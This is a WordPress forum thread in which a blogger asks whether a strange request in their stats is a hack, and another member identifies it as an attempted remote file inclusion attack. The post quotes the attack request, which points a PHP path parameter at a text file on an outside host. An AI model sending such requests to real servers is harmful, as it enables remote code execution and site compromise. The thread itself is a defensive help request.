WordPress.org

Ready to get started?Download WordPress

Forums

How do I know whether this is a hack? (3 posts)

  1. jeremycherfas
    Member
    Posted 6 years ago #

    Looking at slimstat for my blog today, I noticed a reference to this as a New resource

    /wp/Archive/2005/05/17/mything-tips//embed/day.php?path=http://www.iglesialcs.cl/newweb/cache/test.txt???

    I have no idea what this means. The URL at the end of the string seems to be an evangelical website, which is unlikely to have linked to me.

    I'm worried about that //embed directory. I am not aware of any such structure in my setup.

    So, could this be some sort of hack? How do I check? And what do I do about it?

    I've read Donncha's article, and while it is all very helpful, even if I don't understand some of it, it doesn't answer the key question: How do I know whether I have been hacked?

    Obviously I am going to check all my PHP scripts and upload files as soon as I can (no access here), but in the meantime, I would be grateful for any advice anyone can offer.

    Thanks

  2. whooami
    Member
    Posted 6 years ago #

    thats an attempted RFI attack. They happen constantly.

  3. jeremycherfas
    Member
    Posted 6 years ago #

    Thanks. I had a look at the Wikipedia entry for Remote File Inclusion hack, and I have a slightly better idea of what that means.

    Follow up question: is the average WP installation vulnerable to this sort of attack, or can I just ignore it?

Topic Closed

This topic has been closed to new replies.

About this Topic